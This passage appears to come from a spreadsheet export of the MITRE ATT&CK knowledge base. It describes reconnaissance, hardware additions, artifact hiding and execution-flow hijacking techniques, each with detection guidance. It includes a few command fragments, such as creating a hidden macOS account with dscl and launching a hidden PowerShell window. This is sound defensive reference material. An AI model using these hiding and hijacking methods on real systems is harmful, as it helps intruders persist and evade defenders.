    <t>Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Business Lookup)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 or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1591</t>
  </si>
  <si>
    <t>T1591.002</t>
  </si>
  <si>
    <t>Gather Victim Org Information: Business Relationships</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business relationships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[Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1591/002</t>
  </si>
  <si>
    <t>T1591.001</t>
  </si>
  <si>
    <t>Gather Victim Org Information: Determine Physical Locations</t>
  </si>
  <si>
    <t>Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Business Lookup) Gathering this information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[Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1591/001</t>
  </si>
  <si>
    <t>T1591.003</t>
  </si>
  <si>
    <t>Gather Victim Org Information: Identify Business Tempo</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business tempo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[Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199))</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1591/003</t>
  </si>
  <si>
    <t>T1591.004</t>
  </si>
  <si>
    <t>Gather Victim Org Information: Identify Roles</t>
  </si>
  <si>
    <t>Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1591/004</t>
  </si>
  <si>
    <t>T1200</t>
  </si>
  <si>
    <t>Hardware Additions</t>
  </si>
  <si>
    <t>Adversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access. While public references of usage by APT groups are scarce, many penetration testers leverage hardware additions for initial access. Commercial and open source products are leveraged with capabilities such as passive network tapping (Citation: Ossmann Star Feb 2011), man-in-the middle encryption breaking (Citation: Aleks Weapons Nov 2015), keystroke injection (Citation: Hak5 RubberDuck Dec 2016), kernel memory reading via DMA (Citation: Frisk DMA August 2016), adding new wireless access to an existing network (Citation: McMillan Pwn March 2012), and others.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1200</t>
  </si>
  <si>
    <t>Asset management systems may help with the detection of computer systems or network devices that should not exist on a network. 
Endpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports.</t>
  </si>
  <si>
    <t>T1564</t>
  </si>
  <si>
    <t>Hide Artifacts</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</si>
  <si>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detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564</t>
  </si>
  <si>
    <t>26 February 2020</t>
  </si>
  <si>
    <t>Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell commands for hidden attribute usage.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Content, File: File Creation, File: File Creation, File: File Metadata, File: File Modification, Firmware: Firmware Modification, Process: OS API Execution, Process: Process Creation, Process: Process Creation, Script: Script Execution, Service: Service Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1564.005</t>
  </si>
  <si>
    <t>Hide Artifacts: Hidden File System</t>
  </si>
  <si>
    <t>Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
Adversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/005</t>
  </si>
  <si>
    <t>28 June 2020</t>
  </si>
  <si>
    <t>Detecting the use of a hidden file system may be exceptionally difficult depending on the implementation. Emphasis may be placed on detecting related aspects of the adversary lifecycle, such as how malware interacts with the hidden file system or how a hidden file system is loaded. Consider looking for anomalous interactions with the Registry or with a particular file on disk. Likewise, if the hidden file system is loaded on boot from reserved disk space, consider shifting focus to detecting [Bootkit](https://attack.mitre.org/techniques/T1542/003) activity.</t>
  </si>
  <si>
    <t>File: File Modification, Firmware: Firmware Modification, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1564.001</t>
  </si>
  <si>
    <t>Hide Artifacts: Hidden Files and Directories</t>
  </si>
  <si>
    <t>Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (&lt;code&gt;dir /a&lt;/code&gt; for Windows and &lt;code&gt;ls –a&lt;/code&gt; for Linux and macOS).
On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name  (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.
Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.
Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/001</t>
  </si>
  <si>
    <t>Monitor the file system and shell commands for files being created with a leading "." and the Windows command-line use of attrib.exe to add the hidden attribute.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>Host forensic analysis</t>
  </si>
  <si>
    <t>T1564.002</t>
  </si>
  <si>
    <t>Hide Artifacts: Hidden Users</t>
  </si>
  <si>
    <t>Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account.
There is a property value in &lt;code&gt;/Library/Preferences/com.apple.loginwindow&lt;/code&gt; called &lt;code&gt;Hide500Users&lt;/code&gt; that prevents users with userIDs 500 and lower from appearing at the login screen. When using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 (ex: &lt;code&gt;sudo dscl . -create /Users/username UniqueID 401&lt;/code&gt;) and enabling this property (setting it to Yes), an adversary can conceal user accounts. (Citation: Cybereason OSX Pirrit).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/002</t>
  </si>
  <si>
    <t>31 July 2020</t>
  </si>
  <si>
    <t>This technique prevents the new user from showing up at the log in screen, but all of the other signs of a new user still exist. The user still gets a home directory and will appear in the authentication logs.</t>
  </si>
  <si>
    <t>File: File Modification, User Account: User Account Creation, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>T1564.003</t>
  </si>
  <si>
    <t>Hide Artifacts: Hidden Window</t>
  </si>
  <si>
    <t>Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. 
On Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is &lt;code&gt;powershell.exe -WindowStyle Hidden&lt;/code&gt;. (Citation: PowerShell About 2019)
Similarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be &lt;code&gt;apple.awt.UIElement&lt;/code&gt;, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.
Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/003</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions indicative of hidden windows. In Windows, enable and configure event logging and PowerShell logging to check for the hidden window style. In MacOS, plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the &lt;code&gt;apple.awt.UIElement&lt;/code&gt; or any other suspicious plist tag in plist files and flag them.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1564.004</t>
  </si>
  <si>
    <t>Hide Artifacts: NTFS File Attributes</t>
  </si>
  <si>
    <t>Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/004</t>
  </si>
  <si>
    <t>Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA) Monitor calls to the &lt;code&gt;ZwSetEaFile&lt;/code&gt; and &lt;code&gt;ZwQueryEaFile&lt;/code&gt; Windows API functions as well as binaries used to interact with EA, (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) and consider regularly scanning for the presence of modified information. (Citation: SpectorOps Host-Based Jul 2017)
There are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: &lt;code&gt;file.ext:ads[.ext]&lt;/code&gt;) is commonly associated with ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.
The Streams tool of Sysinternals can be used to uncover files with ADSs. The &lt;code&gt;dir /r&lt;/code&gt; command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a &lt;code&gt;-stream&lt;/code&gt; parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution</t>
  </si>
  <si>
    <t>Oddvar Moe, @oddvarmoe; Red Canary</t>
  </si>
  <si>
    <t>Anti-virus, Host forensic analysis, Signature-based detection</t>
  </si>
  <si>
    <t>T1564.006</t>
  </si>
  <si>
    <t>Hide Artifacts: Run Virtual Instance</t>
  </si>
  <si>
    <t>Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/006</t>
  </si>
  <si>
    <t>Consider monitoring for files and processes associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V). Consider monitoring for process command-line arguments that may be atypical for benign use of virtualization software. Usage of virtualization binaries or command-line arguments associated with running a headless (in the background with no UI) virtual instance may be especially suspect. Network adapter information may also be helpful in detecting the use of virtual instances.
If virtualization software is installed by the adversary, the Registry may provide detection opportunities. Consider monitoring for [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software. 
Benign usage of virtualization technology is common in enterprise environments, data and events should not be viewed in isolation, but as part of a chain of behavior.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Janantha Marasinghe; Menachem Shafran, XM Cyber</t>
  </si>
  <si>
    <t>T1564.007</t>
  </si>
  <si>
    <t>Hide Artifacts: VBA Stomping</t>
  </si>
  <si>
    <t>Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
MS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a &lt;code&gt;PerformanceCache&lt;/code&gt; that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the &lt;code&gt;_VBA_PROJECT&lt;/code&gt; stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)
An adversary may hide malicious VBA code by overwriting the VBA source code location with zero’s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the &lt;code&gt;_VBA_PROJECT&lt;/code&gt; stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/007</t>
  </si>
  <si>
    <t>Detection efforts should be placed finding differences between VBA source code and p-code.(Citation: Walmart Roberts Oct 2018) VBA code can be extracted from p-code before execution with tools such as the pcodedmp disassembler. The oletools toolkit leverages the pcodedmp disassembler to detect VBA stomping by comparing keywords present in the VBA source code and p-code.(Citation: pcodedmp Bontchev)(Citation: oletools toolkit)
If the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the &lt;code&gt;PROJECT&lt;/code&gt; stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. For example, adding a module name that is undefined to the &lt;code&gt;PROJECT&lt;/code&gt; stream will inhibit attempts of reading the VBA source code through the GUI.(Citation: FireEye VBA stomp Feb 2020)</t>
  </si>
  <si>
    <t>File: File Content, Script: Script Execution</t>
  </si>
  <si>
    <t>Rick Cole, FireEye</t>
  </si>
  <si>
    <t>T1574</t>
  </si>
  <si>
    <t>Hijack Execution Flow</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.
There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574</t>
  </si>
  <si>
    <t>Defense Evasion, Persistence, Privilege Escalation</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</si>
  <si>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
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Monitor for changes to environment variables, as well as the commands to implement these changes.
Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are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including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Service: Service Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Anti-virus, Application control</t>
  </si>
  <si>
    <t>T1574.012</t>
  </si>
  <si>
    <t>Hijack Execution Flow: COR_PROFILER</t>
  </si>
  <si>
    <t>Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/012</t>
  </si>
  <si>
    <t>For detecting system and user scope abuse of the COR_PROFILER, monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH that correspond to system and user environment variables that do not correlate to known developer tools. Extra scrutiny should be placed on suspicious modification of these Registry keys by command line tools like wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring for command-line arguments indicating a change to COR_PROFILER variables may aid in detection. For system, user, and process scope abuse of the COR_PROFILER, monitor for new suspicious unmanaged profiling DLLs loading into .NET processes shortly after the CLR causing abnormal process behavior.(Citation: Red Canary COR_PROFILER May 2020) Consider monitoring for DLL files that are associated with COR_PROFILER environment variables.</t>
  </si>
  <si>
    <t>Jesse Brown, Red Canary</t>
  </si>
  <si>
    <t>T1574.001</t>
  </si>
  <si>
    <t>Hijack Execution Flow: DLL Search Order Hijacking</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/001</t>
  </si>
  <si>
    <t>Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of `.manifest` and `.local` redirection files that do not correlate with software updates are suspicious.</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Module: Module Load</t>
  </si>
  <si>
    <t>T1574.002</t>
  </si>
  <si>
    <t>Hijack Execution Flow: DLL Side-Loading</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/002</t>
  </si>
  <si>
    <t>Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so) as well as the introduction of new files/programs. Track DLL metadata, such as a hash, and compare DLLs that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1574.004</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Dylib Hijacking</t>
  </si>
  <si>
    <t>Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with &lt;code&gt;@rpath&lt;/code&gt;, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the &lt;code&gt;LC_LOAD_WEAK_DYLIB&lt;/code&gt; function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
Adversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/004</t>
  </si>
  <si>
    <t>Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process. 
Run path dependent libraries can include &lt;code&gt;LC_LOAD_DYLIB&lt;/code&gt;, &lt;code&gt;LC_LOAD_WEAK_DYLIB&lt;/code&gt;, and &lt;code&gt;LC_RPATH&lt;/code&gt;. Other special keywords are recognized by the macOS loader are &lt;code&gt;@rpath&lt;/code&gt;, &lt;code&gt;@loader_path&lt;/code&gt;, and &lt;code&gt;@executable_path&lt;/code&gt;.(Citation: Apple Developer Doco Archive Run-Path) These loader instructions can be examined for individual binaries or frameworks using the &lt;code&gt;otool -l&lt;/code&gt; command. Objective-See's Dylib Hijacking Scanner can be used to identify applications vulnerable to dylib hijacking.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Github EmpireProject HijackScanner)</t>
  </si>
  <si>
    <t>Application control</t>
  </si>
  <si>
    <t>T1574.006</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Dynamic Linker Hijacking</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as &lt;code&gt;LD_PRELOAD&lt;/code&gt; on Linux or &lt;code&gt;DYLD_INSERT_LIBRARIES&lt;/code&gt; on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD)
On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the &lt;code&gt;export&lt;/code&gt; command, &lt;code&gt;setenv&lt;/code&gt; function, or &lt;code&gt;putenv&lt;/code&gt; function. Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export variables in a shell or set variables programmatically using higher level syntax such Python’s &lt;code&gt;os.environ&lt;/code&gt;.
